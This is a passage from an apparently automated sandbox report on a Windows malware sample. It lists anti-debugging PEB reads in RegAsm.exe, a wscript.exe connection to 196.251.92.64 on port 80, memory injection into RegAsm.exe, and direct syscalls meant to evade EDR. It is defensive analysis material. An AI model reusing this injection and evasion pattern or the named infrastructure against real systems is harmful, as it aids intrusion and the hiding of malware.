                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7D6E0 mov eax, dword ptr fs:[00000030h]7_2_02B7D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B836EF mov eax, dword ptr fs:[00000030h]7_2_02B836EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5B6C0 mov eax, dword ptr fs:[00000030h]7_2_02B5B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B816CF mov eax, dword ptr fs:[00000030h]7_2_02B816CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A6C7 mov ebx, dword ptr fs:[00000030h]7_2_02B8A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A6C7 mov eax, dword ptr fs:[00000030h]7_2_02B8A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E627 mov eax, dword ptr fs:[00000030h]7_2_02B6E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F626 mov eax, dword ptr fs:[00000030h]7_2_02B4F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B86620 mov eax, dword ptr fs:[00000030h]7_2_02B86620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B88620 mov eax, dword ptr fs:[00000030h]7_2_02B88620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5262C mov eax, dword ptr fs:[00000030h]7_2_02B5262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92619 mov eax, dword ptr fs:[00000030h]7_2_02B92619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B53616 mov eax, dword ptr fs:[00000030h]7_2_02B53616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B53616 mov eax, dword ptr fs:[00000030h]7_2_02B53616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1866E mov eax, dword ptr fs:[00000030h]7_2_02C1866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1866E mov eax, dword ptr fs:[00000030h]7_2_02C1866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCE609 mov eax, dword ptr fs:[00000030h]7_2_02BCE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8F603 mov eax, dword ptr fs:[00000030h]7_2_02B8F603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6260B mov eax, dword ptr fs:[00000030h]7_2_02B6260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B81607 mov eax, dword ptr fs:[00000030h]7_2_02B81607
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B82674 mov eax, dword ptr fs:[00000030h]7_2_02B82674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A660 mov eax, dword ptr fs:[00000030h]7_2_02B8A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A660 mov eax, dword ptr fs:[00000030h]7_2_02B8A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B89660 mov eax, dword ptr fs:[00000030h]7_2_02B89660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B89660 mov eax, dword ptr fs:[00000030h]7_2_02B89660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25636 mov eax, dword ptr fs:[00000030h]7_2_02C25636
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6C640 mov eax, dword ptr fs:[00000030h]7_2_02B6C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7D7B0 mov eax, dword ptr fs:[00000030h]7_2_02B7D7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F7BA mov eax, dword ptr fs:[00000030h]7_2_02B4F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BDF7AF mov eax, dword ptr fs:[00000030h]7_2_02BDF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BDF7AF mov eax, dword ptr fs:[00000030h]7_2_02BDF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BDF7AF mov eax, dword ptr fs:[00000030h]7_2_02BDF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BDF7AF mov eax, dword ptr fs:[00000030h]7_2_02BDF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BDF7AF mov eax, dword ptr fs:[00000030h]7_2_02BDF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD97A9 mov eax, dword ptr fs:[00000030h]7_2_02BD97A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B507AF mov eax, dword ptr fs:[00000030h]7_2_02B507AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F78A mov eax, dword ptr fs:[00000030h]7_2_02C0F78A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B547FB mov eax, dword ptr fs:[00000030h]7_2_02B547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B547FB mov eax, dword ptr fs:[00000030h]7_2_02B547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5D7E0 mov ecx, dword ptr fs:[00000030h]7_2_02B5D7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B727ED mov eax, dword ptr fs:[00000030h]7_2_02B727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B727ED mov eax, dword ptr fs:[00000030h]7_2_02B727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B727ED mov eax, dword ptr fs:[00000030h]7_2_02B727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C237B6 mov eax, dword ptr fs:[00000030h]7_2_02C237B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5C7C0 mov eax, dword ptr fs:[00000030h]7_2_02B5C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B557C0 mov eax, dword ptr fs:[00000030h]7_2_02B557C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B557C0 mov eax, dword ptr fs:[00000030h]7_2_02B557C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B557C0 mov eax, dword ptr fs:[00000030h]7_2_02B557C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8273C mov eax, dword ptr fs:[00000030h]7_2_02B8273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8273C mov ecx, dword ptr fs:[00000030h]7_2_02B8273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8273C mov eax, dword ptr fs:[00000030h]7_2_02B8273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49730 mov eax, dword ptr fs:[00000030h]7_2_02B49730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49730 mov eax, dword ptr fs:[00000030h]7_2_02B49730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C23749 mov eax, dword ptr fs:[00000030h]7_2_02C23749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCC730 mov eax, dword ptr fs:[00000030h]7_2_02BCC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B85734 mov eax, dword ptr fs:[00000030h]7_2_02B85734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5973A mov eax, dword ptr fs:[00000030h]7_2_02B5973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5973A mov eax, dword ptr fs:[00000030h]7_2_02B5973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B53720 mov eax, dword ptr fs:[00000030h]7_2_02B53720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6F720 mov eax, dword ptr fs:[00000030h]7_2_02B6F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6F720 mov eax, dword ptr fs:[00000030h]7_2_02B6F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6F720 mov eax, dword ptr fs:[00000030h]7_2_02B6F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8C720 mov eax, dword ptr fs:[00000030h]7_2_02B8C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8C720 mov eax, dword ptr fs:[00000030h]7_2_02B8C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B50710 mov eax, dword ptr fs:[00000030h]7_2_02B50710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8F71F mov eax, dword ptr fs:[00000030h]7_2_02B8F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8F71F mov eax, dword ptr fs:[00000030h]7_2_02B8F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B80710 mov eax, dword ptr fs:[00000030h]7_2_02B80710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B57703 mov eax, dword ptr fs:[00000030h]7_2_02B57703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B55702 mov eax, dword ptr fs:[00000030h]7_2_02B55702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B55702 mov eax, dword ptr fs:[00000030h]7_2_02B55702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8C700 mov eax, dword ptr fs:[00000030h]7_2_02B8C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B58770 mov eax, dword ptr fs:[00000030h]7_2_02B58770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60770 mov eax, dword ptr fs:[00000030h]7_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B765 mov eax, dword ptr fs:[00000030h]7_2_02B4B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B765 mov eax, dword ptr fs:[00000030h]7_2_02B4B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B765 mov eax, dword ptr fs:[00000030h]7_2_02B4B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B765 mov eax, dword ptr fs:[00000030h]7_2_02B4B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B50750 mov eax, dword ptr fs:[00000030h]7_2_02B50750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD4755 mov eax, dword ptr fs:[00000030h]7_2_02BD4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92750 mov eax, dword ptr fs:[00000030h]7_2_02B92750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92750 mov eax, dword ptr fs:[00000030h]7_2_02B92750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1972B mov eax, dword ptr fs:[00000030h]7_2_02C1972B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F72E mov eax, dword ptr fs:[00000030h]7_2_02C0F72E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8674D mov esi, dword ptr fs:[00000030h]7_2_02B8674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8674D mov eax, dword ptr fs:[00000030h]7_2_02B8674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8674D mov eax, dword ptr fs:[00000030h]7_2_02B8674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B63740 mov eax, dword ptr fs:[00000030h]7_2_02B63740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B63740 mov eax, dword ptr fs:[00000030h]7_2_02B63740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B63740 mov eax, dword ptr fs:[00000030h]7_2_02B63740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2B73C mov eax, dword ptr fs:[00000030h]7_2_02C2B73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2B73C mov eax, dword ptr fs:[00000030h]7_2_02C2B73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2B73C mov eax, dword ptr fs:[00000030h]7_2_02C2B73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2B73C mov eax, dword ptr fs:[00000030h]7_2_02C2B73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B834B0 mov eax, dword ptr fs:[00000030h]7_2_02B834B0
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 196.251.92.64 80Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
